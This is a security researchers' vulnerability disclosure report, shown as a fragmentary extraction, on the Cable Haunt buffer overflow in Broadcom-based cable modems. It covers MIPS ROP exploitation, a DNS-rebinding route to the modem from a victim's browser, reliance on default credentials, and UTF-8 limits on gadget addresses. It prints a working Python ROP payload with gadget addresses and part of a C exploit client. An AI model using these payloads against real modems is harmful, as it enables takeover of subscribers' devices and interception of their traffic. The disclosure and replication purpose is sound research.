Cable Haunt: Vulnerability Report: Broadcom Chip Based Cable Modems
Cable Haunt: Vulnerability Report: Broadcom Chip Based Cable Modems
© Lyrebirds ApS
© Lyrebirds ApS
Lyrebirds ApS
https://lyrebirds.dk
© Lyrebirds ApS
Contents
1 Introduction 1
3 Spectrum Analyzer 5
3.1 Overflowing the Registers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
iii
1 Introduction
This report covers the Cable Haunt vulnerabilities found in Broadcom chip based cable
modems by Lyrebirds ApS. The purpose of the report is to describe all details and aspects
of Cable Haunt, such that manufactures, ISPs, businesses and end users can understand,
replicate and expand the research the danger associated with the use of the affected
unpatched Broadcom chip based cable modems.
The exploit is explained from the inside out, starting with the architecture of the
Broadcom chip based cable modems. Then the attack on the spectrum analyzer is
presented, which is the central part of gaining complete control over the cable modem.
Afterwards, it is explained how to achieve remote access to the spectrum analyzer.
Without external access, the spectrum analyzer would only be exploitable on the local
network.
In the appendices is a list of the modems confirmed as vulnerable, exploitation of
specific cable modems and guides and help on exploring the vulnerabilities and expanding
them to other modems.
1
2 Architecture of Broadcom chip
based cable modems
Cable Haunt targets a vulnerable middleware running on the chip, which is used in
many cable modems all over the world. Cable modems with this chip are built with
different architectures, some running a single CPU, while others run two CPUs, one for
each subsystem. As an example, the dual CPU system found in Technicolor modems can
be seen in Figure 2.1. All tested cable modems are listed in Appendix ??, and all share
the same vulnerability.
The Broadcom cable modem middleware runs on a real-time operating system, eCos,
which runs all networking tasks, such as DOCSIS Protocol, IP-stack etc. Along with
the Broadcom middleware there usually exists a separate subsystem in the architecture,
which is responsible for various things depending on the manufacture. For instance
Sagemcom uses it as a residential gateway for handling the web controller and etc.
Technicolor uses it as a media server as show in Figure 2.1.
The eCos operating system handles all of the networking protocols and the connecting
to the CMTS, including firmware upgrades and keeping track of dynamic settings such
as BPI+ and DOCSIS. As all traffic goes though the eCos operating system, a would-be
attacker with access to it, could listen and manipulate any traffic going through the
modem. Attempts to regain control of the modem through firmware upgrades or remote
3
ARCHITECTURE OF BROADCOM CHIP BASED CABLE MODEMS: eCos
resets, can not be counted on to recover the system, as this depends on the exploited
system.
2.1 eCos
The eCos operating system is an embedded multi-threaded operating system, which is
widely used in embedded networking products. This OS separate applications into tasks
with fixed maximum stack size of each thread and applications can use malloc to alocate
space on the heap. Even though the stack has a fixed size threads still uses the $sp for
pushing and popping from the stack. Applications are compiled directly into the .text part
of the OS it self, meaning that the application layer is directly a part of the OS. This also
means that applications can directly manipulate OS code and data. This OS employs few
protections against potential exploits eg. no Address space layout randomization (ASLR),
not protection against stack smashing, allowing stack execution etc. This makes it easy
to write exploits, as code addresses will always be at a fixed location. The OS never calls
__stack_chk_fail making it vulnerable to stack buffer overflow attacks. For these reasons
finding exploits, Cable Haunt included, is much easier, and it is very possible that Cable
Haunt would never have been exploitable with a sturdier OS and architecture.
4
3 Spectrum Analyzer
The specific target of this exploit, is the tool called the spectrum analyzer, which can be
exploited through a buffer overflow. The intended purpose of the spectrum analyzer is to
identify potential problems with the connection through the cable, such as interference.
The spectrum analyzer is exposed to the local network on varying ports, though often
8080 or 6080, depending on particular cable modem. The modem is often assigned
either 192.168.100.0 or 192.168.100.1 as its IP address on the network. Note that this
IP address is separate from the router, which often lives in the low range of 192.168.0.*
or 192.168.1.*. Even if the modem is not available on the IPs above it can be discovered
by running a port/ip scanner on 192.168.*.*. For instance, NMAP can be used as seen
in Listing 3.1, which will also reveal the port of the spectrum analyzer.
In some cases the endpoint require credentials, but so far only default credentials have
been employed, granting no actual security. IPs, ports and default credentials for all
tested modems have been moved from this report to the "Am I Affected"-FAQ on the
Cable Haunt website, to centralize the information. A script that automatically finds and
test the endpoint can be found on GitHub.
1 nmap 192.168.0.0/16
5
SPECTRUM ANALYZER: Overflowing the Registers
1 {
2 "jsonrpc":"2.0",
3 "method":"Frontend::GetFrontendSpectrumData"
4 ,"params":{
5 "coreID":0,
6 "fStartHz":0,
7 "fStopHz":1000000000,
8 "fftSize":1024,
9 "gain":1,
10 "numOfSamples":256
11 }
12 ,"id":"0"
13 }
1 {
2 "jsonrpc":"2.0",
3 "method":"Frontend::GetFrontendSpectrumData"
4 ,"params":{
5 "coreID":0,
6 "fStartHz":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....",
7 "fStopHz":1000000000,
8 "fftSize":1024,
9 "gain":1,
10 "numOfSamples":256
11 }
12 ,"id":"0"
13 }
6
4 Exploiting the Buffer Overflow
This chapter will discuss, in detail, how the MIPS architecture and eCos OS affects
different exploitation strategies. It will explain how, based on calling convention and OS,
Cable Haunt is most conveniently exploited using return oriented programming.
• $t7 - $t9 are caller saved register and also used as parameters if more than 4 is
needed. Further are pushed to the stack.
• $fp are the frame pointer but used as a s register under this calling convention.
There are in total eight callee saved registers, $s0-$s7, apart from the return address.
Since the spectrum analyzer uses all eight of them, they are all, together with the return
address, pushed to the stack and restored before returning. Since we can overwrite the
stack during execution we have full control of program execution, via the return address,
and all $s registers. $s registers are the most commonly used registers in normal program
flow, which help when exploiting the buffer overflow.
Besides dictating how parameters are passed, the O32 ABI convention also specifics
how the stack should be extended and restored. As the frame pointer is used as a normal
register it is not used for referencing variables in scope of the function, instead the stack
pointer is used. The stack pointer is only manipulated in the beginning and end of a
function. In the beginning it will be counted down by the amount of bytes needed for
the function and in the end the same value is added again. This means that the stack
pointer is only being manipulated in a relative manner and never saved on the stack,
excluding kernel operations such as context switch, for which exploits would be highly
inconsistent if possible.
7
EXPLOITING THE BUFFER OVERFLOW: Limitations
4.2 Limitations
As the stack pointer is never pushed to the stack, we cannot manipulate or read it,
meaning that we cannot leak the stack pointer or use stack pivoting. This makes stack
execution impractical even though it is allowed by the OS. The firmware is statically linked
and there is no global offset table or procedure linkage table that can be overwritten.
This leaves return oriented programing (ROP) as the best choice, since the firmware is
not running with position independent execution and there is no address space layout
randomization, making all addresses are known before hand. Further more, the firmware
is statically linked with most of glibc available leaving us with a lot of gadgets.
8
5 Gaining Access Externally
The CM itself is not exposed directly to the internet, and can only be accessed from
within the local network. This should not be considered a security measure, as the local
network is not always protected. Cable Haunt gains access to the local network, by
having the victim execute malicious code in their browser. While cross-origin resource
sharing (CORS) rules usually prevents this attack, all cable modems listed in the "Am
I Affected"-FAQ are found vulnerable to DNS Rebinding attacks and direct javascript
requests. It is unlikely that this is an exhaustive list. Additionally, there are other ways
to circumvent CORS security in the browser and the attacks work from any system
connected to the network.
9
GAINING ACCESS EXTERNALLY: Authorization
the websocket connection is established against the same domain name CORS is not
violated. Servers should reject any requests, which are sent towards a hostname that is
not explicitly recognized. For the case of a modem on the local network, this should be
limited to its IP, however no tested modems had such preventive measures. The steps of
the attack are outlined below, and can be seen in Figure 5.1.
• The victim clicks the malicious link, and the initial request is made from the victims
browser.
– The domain name is resolved to the public IP of the malicious server.
• As the initial request resolves, the website returns the malicious code which
launches the attack.
• The DNS time-to-live option is set very low, causing the client to prompt the server
for its IP again.
• Instead of resolving to the actual IP of the server, this time it returns the local IP
for the CM.
• The malicious code loops until it gets a successful request from the modem.
– Depending on the browser and OS DNS caching settings, this will usually
take up to a minute.
• The client will now start sending requests towards the CM, in particular the spec-
trum analyzer.
5.4 Authorization
Some modems requires basic authorization before requests are accepted, however all
tested modems have working default credentials. A complete list of the explored modems
and their default credentials can be found in the "Am I Affected"-FAQ. In the case of
basic authorization protection, these can trivially be added to any direct javascript
request. In the case of DNS rebinding, the credentials should be added to the link, e.g.
http://username:[email protected], which will make the browser use
these credential on every request, even after resolving to another IP.
10
GAINING ACCESS EXTERNALLY: Unreachable gadgets
For instance, the address 0x8080a864 can not directly be inserted in a WebSocket
text frame. Any byte starting with b10, like 0x80 does, must be a trailing byte and no
UTF-8 symbol have been started, the address is not a valid UTF-8 character. However, if
we add 0xf2 to the address, it becomes valid, as 0xf2 starts a new UTF-8 symbol with 3
trailing bytes, here being 0x80, 0x80, 0xa8 and one ascii char 0x64. The following bytes
cannot be present in any address or data used because of the utf-8 specification2 : 0xc0,
0xc1,0xf5, 0xf6, 0xf7, 0xf8, 0xf9, 0xfa, 0xfb, 0xfc, 0xfd, 0xfe, 0xff. Further more 0x2c
and 0x00 cannot be used as 0x2c is ’,’ and is our json deliminator and 0x00 because we
use strncpy. Be aware that when inserting a byte sequence such as 0xf28080a864 it has
to be shifted one character so the address align with the position for the gadget. The
extra 0xf2 byte may now be positioned in another register such as a $s register making
this registers value limited during execution of the gadget. This also limits the values
we can put on the stack, for instance we cannot write the local ip 192.168.0.10 as it
contains 192 (0xC0) which is an invalid UTF-8 byte. In the cases were we need to call
a function which is unreachable we can use other gadgets to add to registers together
adding up to the desired value and jumping to that register instead. A python script to
test and inform you how a potential register value can be represented by a UTF8-char
can be found in the GitHub page for the Sagemcom F@st 3890 Exploit.
2
https://en.wikipedia.org/wiki/UTF-8#Codepage_layout
11
A Technical Replication
This chapter explain how to run the proof of concept exploit for two of the vulnerable
cable modems. However, if this example can not be replicated successfully for a given
modem, it could still be vulnerable to variations of the exploit.
A.1 Requirements
There are three elements to set up in this test: The modem to be exploited, the malicious
server doing the attack, and a victim to access the malicious site. Internet is not required
during the proof of concept, however if not both the victim and attack must be on the
modems lan network. The following software should be installed beforehand:
• python pwntools:
– http://docs.pwntools.com/en/stable/
– https://github.com/Lyrebirds/technicolor-tc7230-exploit
A.2 Configuration
In the static js file change the connection string on line 424 to the port and ip which your
target modem uses for the spectrum analyzer. If the spectrum analyzer is protected by
basic auth set change the username and password as well.
Then, to run the http server hosting the javascript exploiting the modem, run the following
command, inside the root folder containing it.
13
TECHNICAL REPLICATION
When clicking on the link malicious javascript and html will be served and the javascript
will keep trying to establish a websocket connection to the domain name. After the
second request, the dns server will start to redirect requests against the domain name to
the modem. At some point the browser will update the IP address associated with the
domain name and the javascript will establish a http connection to the cable modem
initiating the exploit. This exploit only works for the TC7230 and will be explained in
more details in the following chapter.
14
B Modem-Specific Knowledge
This chapter explains techniques used to obtain the information in the report. It is
intended to assist other people in extending Cable Haunt to other modems, than those
included in ??, by showing the specific process of creating the exploit on a specific modem.
The chapter will also elaborate on how the exploited can be leveraged differently on
specific modems.
15
MODEM-SPECIFIC KNOWLEDGE
The IP can vary but it can be found in GatewaySettings.bin (see Section B.1.1) like any
other device.
By probing around the operating system through the telnet, it was discovered that the
media server and the cable modem itself shared both ONFI and SPI. Additionally, the
SNMP connection is open while the modem is not online, making it possible to establish
a serial connection. Several attempts at extracting the firmware of the cable modem via
the Linux system, was thwarted by race conditions, and another method was employed.
16
MODEM-SPECIFIC KNOWLEDGE
About a thousand functions later, top-level calls used by the web-interfaces or dealing
with JSON parameters, began to appear. At this level the buffer overflow vulnerability
in the spectrum analyzers JSON reader was discovered. Tests on the spectrum analyzer
endpoint showed no password protection and no checks against requests made via DNS
rebind. The interface of the spectrum analyzer can be seen in Figure B.3.
• In MIPS, relational jumps do not exist. For instance, loops are created with the
exact start address of the loop as the jump destination, not the distance.
17
MODEM-SPECIFIC KNOWLEDGE
1 {
2 "jsonrpc":"2.0",
3 "method":"Frontend::GetFrontendSpectrumData"
4 ,"params":{
5 "coreID":0,
6 "fStartHz":0,
7 "fStopHz":1000000000,
8 "fftSize":1024,
9 "gain":1,
10 "numOfSamples":256
11 }
12 ,"id":"0"
13 }
• All callee registers are saved to the stack before the function is executed and
restored again from the stack after execution.
– Therefore, a buffer overflow that writes to the stack can overwrite to the
saved callee registers.
18
MODEM-SPECIFIC KNOWLEDGE
19
MODEM-SPECIFIC KNOWLEDGE
20
MODEM-SPECIFIC KNOWLEDGE
in the control of the ISP. It grants anyone using it access to the user web interface and
it is only possible to remove with a firmware update. It therefore also supersedes the
credentials found in Section B.1.1. This password has been removed by most of the
cable modem manufacturers tested and the Technicolor hardware is currently the only
hardware found where it is useable.
21
MODEM-SPECIFIC KNOWLEDGE
2
3 start = """{
4 "jsonrpc":"2.0",
5 "method":"Frontend::GetFrontendSpectrumData",
6 "params":{
7 "coreID":0,
8 "fStartHz":"""
9
10 end = """,
11 "gain":1
12 },
13 "id":"0"
14 }"""
15
16 loopGadget = bytearray.fromhex(’80ee567c’) # Also used for S7 register
17 allowConfig = bytearray.fromhex(’80280474’) # Factory mode function
18 getSingletonMutex = bytearray.fromhex(’8025ecd0’)
19 allowConfigGadget = bytearray.fromhex(’800aa090’)
20
21 payload = (start.encode(’ascii’) +
22 (’A’*116).encode(’ascii’) + allowConfig + # sp+116 (s1)
23 (’A’*20).encode(’ascii’) + loopGadget + # sp+144 (s7)
24 (’A’*4).encode(’ascii’) + getSingletonMutex + # sp+148 (ra)
25 (’A’*28).encode(’ascii’) + allowConfigGadget + # sp+160+20 (??)
26 (’A’*60).encode(’ascii’) + loopGadget + # sp+160+20+40 (??)
27 end.encode(’ascii’))
28
29 websocket.WebSocket()
30 ws.connect("ws://192.168.100.1:8080/Frontend")
31 ws.send(payload)
32
33 #The final json request string:
34 #{
35 # "jsonrpc":"2.0",
36 # "method":"Frontend::GetFrontendSpectrumData",
37 # "params":{
38 # "coreID":0,
39 # "fStartHz":AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
40 # AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x80(\x04tAAAAAAAAAAAAAA
41 # AAAAAA\x80\xeeV|AAAA\x80%\xec\xd0AAAAAAAAAAAAAAAAAAAAAAAAAAAA\x80\n
42 # \xa0\x90AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
43 # \x80\xeeV|,
44 # "gain":1
45 # },
46 # "id":"0"
47 #}
The code overrides the correct addresses as explained in Section B.1.6 ending up
calling the target function correctly.
Since we have full access to the linux side externally we can simply compile the
code, and send it to the server over FTP. The equivalent C code executed on the media
22
MODEM-SPECIFIC KNOWLEDGE
server can be seen in Listing B.3. A guide for installing the toolchain can be found
at https://github.com/broadcom/aeolus. This installs a linux elf toolchain for mips
architectures, and if one wants to compile raw mips binary for running on the eCos side
you have to strip the elf file as done in the Makefile of this project.
1 #include <stdlib.h>
2 #include <string.h>
3 #include <stdio.h>
4 #include <netinet/in.h>
5 #include <sys/types.h>
6 #include <sys/socket.h>
7 #include <arpa/inet.h>
8 #include <unistd.h>
9
10 #define REMOTE_ADDR "192.168.100.1"
11 #define REMOTE_PORT 8080
12 #define BUF_SIZE 10000
13
14 char payload1[] = {
15 0x47, 0x45, 0x54, 0x20, 0x2f, 0x20, 0x48, 0x54,
16 0x54, 0x50, 0x2f, 0x31, 0x2e, 0x31, 0x0d, 0x0a,
17 0x55, 0x70, 0x67, 0x72, 0x61, 0x64, 0x65, 0x3a,
18 0x20, 0x77, 0x65, 0x62, 0x73, 0x6f, 0x63, 0x6b,
19 0x65, 0x74, 0x0d, 0x0a, 0x43, 0x6f, 0x6e, 0x6e,
20 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x3a, 0x20,
21 0x55, 0x70, 0x67, 0x72, 0x61, 0x64, 0x65, 0x0d,
22 0x0a, 0x48, 0x6f, 0x73, 0x74, 0x3a, 0x20, 0x31,
23 0x32, 0x37, 0x2e, 0x30, 0x2e, 0x30, 0x2e, 0x31,
24 0x3a, 0x31, 0x32, 0x33, 0x34, 0x0d, 0x0a, 0x4f,
25 0x72, 0x69, 0x67, 0x69, 0x6e, 0x3a, 0x20, 0x68,
26 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f, 0x31, 0x32,
27 0x37, 0x2e, 0x30, 0x2e, 0x30, 0x2e, 0x31, 0x3a,
28 0x31, 0x32, 0x33, 0x34, 0x0d, 0x0a, 0x53, 0x65,
29 0x63, 0x2d, 0x57, 0x65, 0x62, 0x53, 0x6f, 0x63,
30 0x6b, 0x65, 0x74, 0x2d, 0x4b, 0x65, 0x79, 0x3a,
31 0x20, 0x72, 0x32, 0x73, 0x72, 0x55, 0x4f, 0x6b,
32 0x50, 0x62, 0x6e, 0x4b, 0x68, 0x79, 0x6d, 0x48,
33 0x7a, 0x4e, 0x45, 0x77, 0x50, 0x74, 0x77, 0x3d,
34 0x3d, 0x0d, 0x0a, 0x53, 0x65, 0x63, 0x2d, 0x57,
35 0x65, 0x62, 0x53, 0x6f, 0x63, 0x6b, 0x65, 0x74,
36 0x2d, 0x56, 0x65, 0x72, 0x73, 0x69, 0x6f, 0x6e,
37 0x3a, 0x20, 0x31, 0x33, 0x0d, 0x0a, 0x0d, 0x0a };
38
39 char payload2[] = {
40 0x81, 0xfe, 0x01, 0x6a, 0x15, 0x2a, 0x61, 0xcd,
41 0x6e, 0x08, 0x0b, 0xbe, 0x7a, 0x44, 0x13, 0xbd,
42 0x76, 0x08, 0x5b, 0xef, 0x27, 0x04, 0x51, 0xef,
43 0x39, 0x08, 0x0c, 0xa8, 0x61, 0x42, 0x0e, 0xa9,
44 0x37, 0x10, 0x43, 0x8b, 0x67, 0x45, 0x0f, 0xb9,
45 0x70, 0x44, 0x05, 0xf7, 0x2f, 0x6d, 0x04, 0xb9,
46 0x53, 0x58, 0x0e, 0xa3, 0x61, 0x4f, 0x0f, 0xa9,
47 0x46, 0x5a, 0x04, 0xae, 0x61, 0x58, 0x14, 0xa0,
48 0x51, 0x4b, 0x15, 0xac, 0x37, 0x06, 0x43, 0xbd,
23
MODEM-SPECIFIC KNOWLEDGE
24
MODEM-SPECIFIC KNOWLEDGE
B.2.1 Architecture
The Sagemcom Fast 3890v3 runs on two CPU’s with MIPS architecture. One processor
runs the Cable Modem (CM), a real time operating system which runs all networking
tasks, such as DOCSIS Protocol, IP-stack etc. The other processor runs the Residential
Gateway (RG), which is a linux operating system in charge of administration and multi-
media tasks. The RG side can read and set SNMP of the CM as well as accessing a
telnet session on the CM using the ip address 172.31.255.45 which is only reachable
from the RG. This means that an attacker with control of the RG can set the SNMP
variable controlling the telnet username and password of the CM, and there by ganing
full access. The two CPU’s share the same flash storage and main memory, leaving a
potential vulnerability, where an attacker writes to the memory of the other system. This
potential vulnerability has not been pursued at the time of writing.
Residential Gateway
The RG operates as a bridge between the administration web panel, which the user sees,
and the CM as shown in Figure B.7. The RG uses SNMP and telnet to configure the CM,
when receiving an HTTP configuration change requests. So if an attacker can send these
configuration change requests, he is almost in full control of the entire cable modem.
Besides bridging the connection, the RG also runs multimedia services such as UPNP
and the authentication for most web endpoints accessible on the local network. All RGs
have two users for administration in the web control panel, a admin user and a support
user. Both users have the same access rights but the support user is meant to only be
25
MODEM-SPECIFIC KNOWLEDGE
used by ISP technicians. Username and password for both users are initially configured
using the provisioning file send from the ISP, but can be changed using SNMP.
The RGs from the ISP we have researched provides all RGs with unique passwords for
the administration user, making it practically impossible to use this user as authentication
for a potential attacker. However, as we will see later in this section, the support user is
configured with default username and password, that can be used to access the RG.
Cable Modem
The CM also runs on the same eCos operating system as the TC7230, which is explained
in Section 2.1, with the application layer compiled into the OS. This OS handles all of
the networking protocols and the connecting to the CMTS. Additionally, this is also the
OS handling firmware upgrade and keeping track of dynamic settings such as BPI+ and
DOCSIS. As all traffic goes though this CPU and a would-be attacker with access to this
OS, could listen and manipulate any traffic going through the modem. Attempts to regain
control of the modem through firmware upgrades or resets, can not be counted on to
recover the system.
26
MODEM-SPECIFIC KNOWLEDGE
27
MODEM-SPECIFIC KNOWLEDGE
values. It is also possible to write new functions in the allocated memory and call them,
as the eCos system has no protection against calling functions on either the stack or heap.
This gives the attacker full control of the CM including control of firmware upgrades,
hot swapping code, blocking out remote service access, and perhaps most importantly,
control of incoming and outgoing traffic.
28